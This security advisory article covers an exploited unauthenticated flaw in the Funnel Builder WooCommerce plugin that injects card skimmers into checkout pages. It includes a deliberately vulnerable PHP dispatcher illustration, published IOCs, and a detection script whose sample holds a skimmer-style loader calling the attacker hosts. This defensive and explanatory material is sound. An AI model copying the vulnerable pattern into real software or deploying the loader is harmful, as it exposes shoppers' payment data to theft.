Funnel Builder WooCommerce Flaw Exploited to Steal Card Data

Attackers are exploiting Funnel Builder by FunnelKit before version 3.15.0.3 to inject fake analytics scripts into WooCommerce checkout pages and steal payment details.

Attackers are actively exploiting a critical vulnerability in Funnel Builder by FunnelKit, a WordPress plugin used to customize WooCommerce checkout flows. Sansec says vulnerable stores can be abused without authentication to inject arbitrary JavaScript into checkout pages, where the code can steal payment-card numbers, CVVs, billing addresses, and other customer data.[1]

The practical risk is direct: this is not a cosmetic WordPress admin bug. It targets the checkout path, so a compromised site can keep taking orders while quietly leaking payment details. The fixed version is Funnel Builder 3.15.0.3; Sansec and BleepingComputer both report that versions before 3.15.0.3 are affected, and the plugin has more than 40,000 active installations according to WordPress.org.[1][2][3]

[Figure: cartoon of a fake analytics tag stealing WooCommerce checkout card data through Funnel Builder's External Scripts setting.]
When analytics wears a mask, check the checkout scripts first.

What store owners should verify now

Sansec traces the issue to a public checkout endpoint in older Funnel Builder releases that let a request invoke internal plugin methods without a permission check and without a safe allow-list of callable methods. That path let an unauthenticated request write attacker-controlled content into the plugin's global settings. If the attacker placed a script in the External Scripts setting, the plugin printed it on every Funnel Builder checkout page, where it ran during checkout transactions.[1]
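The pattern Sansec describes is easiest to see side by side with its fix. The following PHP is an added illustration written for this article, not FunnelKit's code: the class, AJAX action names, option key and method names are all assumptions. The vulnerable half registers one handler for logged-in and anonymous callers and dispatches to whatever method the request names; the hardened half keeps an explicit allow-list for the public endpoint and moves settings writes to an admin-only handler guarded by a nonce and a capability check.

```php
<?php
/**
 * Added illustration of the flaw class Sansec describes; NOT FunnelKit's code.
 * Class, action, option and method names are assumptions for the example.
 */
class Hypothetical_Checkout_Endpoint {

    /* ---------- vulnerable pattern ---------- */

    public function register_vulnerable() {
        // Same handler for logged-in and anonymous (nopriv) callers.
        add_action( 'wp_ajax_hypo_checkout', array( $this, 'vulnerable_dispatch' ) );
        add_action( 'wp_ajax_nopriv_hypo_checkout', array( $this, 'vulnerable_dispatch' ) );
    }

    public function vulnerable_dispatch() {
        $method = isset( $_REQUEST['method'] ) ? (string) $_REQUEST['method'] : '';
        // BUG: every public method of this object is reachable, including the
        // settings writer below, with arguments taken straight from the request.
        if ( method_exists( $this, $method ) ) {
            call_user_func( array( $this, $method ), $_REQUEST );
        }
        wp_die();
    }

    // Intended for internal use only, but public, so the dispatcher exposes it.
    public function save_global_settings( $data ) {
        $settings = get_option( 'hypo_global_settings', array() );
        // Whatever lands here is later printed verbatim into checkout pages, so a
        // <script> tag pointing at an attacker host becomes a skimmer loader.
        $settings['external_scripts'] = isset( $data['external_scripts'] ) ? (string) $data['external_scripts'] : '';
        update_option( 'hypo_global_settings', $settings );
    }

    /* ---------- hardened pattern ---------- */

    // Explicit allow-list of what anonymous checkout traffic may call.
    // Nothing in it writes options.
    private $public_methods = array( 'get_shipping_estimate', 'validate_coupon' );

    public function register_hardened() {
        add_action( 'wp_ajax_hypo_checkout', array( $this, 'hardened_dispatch' ) );
        add_action( 'wp_ajax_nopriv_hypo_checkout', array( $this, 'hardened_dispatch' ) );
        // Settings writes: logged-in hook only, deliberately no nopriv variant.
        add_action( 'wp_ajax_hypo_save_settings', array( $this, 'admin_save_settings' ) );
    }

    public function hardened_dispatch() {
        $method = isset( $_REQUEST['method'] ) ? sanitize_key( wp_unslash( $_REQUEST['method'] ) ) : '';
        if ( ! in_array( $method, $this->public_methods, true ) ) {
            wp_send_json_error( 'unknown method', 400 ); // sends the response and exits
        }
        call_user_func( array( $this, $method ), $_REQUEST );
        wp_die();
    }

    public function admin_save_settings() {
        check_ajax_referer( 'hypo_save_settings', 'nonce' ); // CSRF check; dies on failure
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }
        $settings = get_option( 'hypo_global_settings', array() );
        // Kept raw on purpose: the feature exists so admins can paste script tags.
        // Restricting who may write it is the control, not sanitizing the value.
        $settings['external_scripts'] = isset( $_POST['external_scripts'] ) ? wp_unslash( $_POST['external_scripts'] ) : '';
        update_option( 'hypo_global_settings', $settings );
        wp_send_json_success();
    }

    public function get_shipping_estimate( $req ) { wp_send_json_success( array( 'estimate' => '0.00' ) ); }
    public function validate_coupon( $req )       { wp_send_json_success( array( 'valid' => false ) ); }
}
```

With the vulnerable registration, an anonymous POST to admin-ajax.php naming method=save_global_settings is enough to change the option that the checkout template prints. With the hardened registration the same request gets a 400 from the allow-list, and the only path that writes external_scripts requires a logged-in user with manage_options and a valid nonce.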

Item                                          Status
Funnel Builder by FunnelKit before 3.15.0.3   Affected; update immediately.
Funnel Builder 3.15.0.3 and later             Patched according to the plugin changelog.
WooCommerce checkout pages using the plugin   Review for unexpected scripts and skimmer behavior.
Known observed IOCs                           analytics-reports[.]com/wss/jquery-lib.js and wss://protect-wss[.]com/ws

The observed payload was designed to look like familiar analytics infrastructure. Sansec found a fake Google Tag Manager or Google Analytics-style loader that pulled JavaScript from analytics-reports[.]com/wss/jquery-lib.js and opened a WebSocket connection to wss://protect-wss[.]com/ws. The returned skimmer was tailored to the victim storefront and focused on payment and billing fields.[1]

For administrators, the first step is to update Funnel Builder from the WordPress dashboard or replace it manually with version 3.15.0.3 or later. The second step is equally important: open the FunnelKit checkout settings and review Settings > Checkout > External Scripts and any other custom script areas for unfamiliar tags. Do not assume that a script is safe because it looks like GTM, Google Analytics, or a marketing pixel. This is a common Magecart pattern: the attacker hides in the part of the page reviewers expect to be noisy.

After updating, check recent orders and checkout traffic for signs of customer-data exposure. Useful triage includes looking for the two IOCs above, recently modified FunnelKit settings, unexpected JavaScript in page source, suspicious POST requests around checkout endpoints, and scripts that load from domains unrelated to your normal analytics, ad, or payment stack. If card data may have been exposed, preserve logs and coordinate the incident response with the payment processor and legal/compliance owner before deleting evidence.
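Part of that triage can be scripted. The following PHP CLI scanner is an added example written for this article, not code from Sansec, FunnelKit or the other sources. It reads a saved copy of the rendered checkout page (or, with no argument, a constructed sample that mimics the fake analytics loader), lists every external script and WebSocket host, flags the two published IOCs, and reports any host outside an allow-list. The allow-list and the sample page are assumptions; edit the list to match your own analytics, ad and payment stack.

```php
<?php
// Added triage helper, not part of the article's sources or of FunnelKit.
// Usage: php scan_checkout.php checkout.html
// Produce checkout.html first with a normal browser save or, for example,
//   curl -s -A 'Mozilla/5.0' https://shop.example/checkout/ -o checkout.html   (host assumed)
// The same function also works on the raw text of the External Scripts setting.

// Assumed allow-list: replace with the hosts your store legitimately loads.
$allowed_hosts = array(
    'www.googletagmanager.com',
    'www.google-analytics.com',
    'js.stripe.com',
    'www.paypal.com',
);

// IOCs published by Sansec for this campaign (de-fanging brackets removed).
$known_iocs = array( 'analytics-reports.com', 'protect-wss.com' );

/**
 * Returns one finding per external URL that is either a known IOC or a host
 * missing from the allow-list. Relative/local scripts are ignored.
 */
function scan_checkout_html( $html, array $allowed_hosts, array $known_iocs ) {
    $findings = array();
    $dom = new DOMDocument();
    libxml_use_internal_errors( true );   // tolerate real-world, non-XHTML markup
    $dom->loadHTML( $html );
    libxml_clear_errors();

    foreach ( $dom->getElementsByTagName( 'script' ) as $script ) {
        $urls = array();
        $src  = $script->getAttribute( 'src' );
        if ( $src !== '' ) {
            $urls[] = $src;
        }
        // Inline loaders: pull every http(s):// or ws(s):// URL out of the body.
        if ( preg_match_all( '#\b(?:https?|wss?)://[^\s\'"<>]+#i', $script->textContent, $m ) ) {
            $urls = array_merge( $urls, $m[0] );
        }
        foreach ( $urls as $url ) {
            $host = strtolower( (string) parse_url( $url, PHP_URL_HOST ) );
            if ( $host === '' ) {
                continue;   // relative path such as /wp-content/..., served locally
            }
            foreach ( $known_iocs as $ioc ) {
                if ( $host === $ioc || substr( $host, -strlen( '.' . $ioc ) ) === '.' . $ioc ) {
                    $findings[] = "KNOWN IOC:       $url";
                    continue 2;
                }
            }
            if ( ! in_array( $host, $allowed_hosts, true ) ) {
                $findings[] = "UNEXPECTED HOST: $url";
            }
        }
    }
    return $findings;
}

// Constructed sample resembling the fake GTM-style loader Sansec describes;
// used only when no file is given on the command line.
$sample_html = <<<'HTML'
<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script>
(function(){var s=document.createElement('script');
s.src='https://analytics-reports.com/wss/jquery-lib.js';document.head.appendChild(s);
var w=new WebSocket('wss://protect-wss.com/ws');})();
</script>
<script src="https://cdn.example-marketing.net/pixel.js"></script>
</head><body></body></html>
HTML;

$html     = isset( $argv[1] ) ? file_get_contents( $argv[1] ) : $sample_html;
$findings = scan_checkout_html( $html, $allowed_hosts, $known_iocs );
if ( ! $findings ) {
    echo "No unexpected script hosts found.\n";
} else {
    echo implode( "\n", $findings ), "\n";
}
exit( $findings ? 1 : 0 );
```

On the constructed sample the scanner reports the two IOC URLs and the unlisted marketing host, skips the local WooCommerce script, and accepts the Google Tag Manager loader; the non-zero exit status makes it usable as a recurring check after the update. Treat "unexpected host" as a prompt to verify, not proof of compromise, and treat any IOC hit as grounds to preserve logs before changing anything else.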

Howtofix.guide has covered the same web-skimming pattern before: fake plugin abuse in WordPress malware campaigns, skimmers hiding behind Google Analytics-like infrastructure, and Magecart operators using fake Google-themed domains. The Funnel Builder case fits that pattern closely, but the checkout-plugin context makes it especially urgent for WooCommerce stores because the malicious code lands exactly where customers type payment details.

There is no official CVE identifier for this specific bug at publication time.[2] That should not lower priority. Active exploitation, unauthenticated settings modification, a patched release, and public IOCs are enough to justify immediate action.

References

  1. Sansec Forensics Team. Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts. Published May 14, 2026.
  2. BleepingComputer. Funnel Builder WordPress plugin bug exploited to steal credit cards. Published May 15, 2026.
  3. WordPress.org Plugin Directory. FunnelKit – Funnel Builder for WooCommerce Checkout. Accessed May 16, 2026.
  4. The Hacker News. Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming. Published May 16, 2026.

About the author

Emma Davis

Content editor and security writer focused on making malware-removal and scam-prevention guides easier to understand. Emma reviews structure, clarity, and source consistency before articles are published.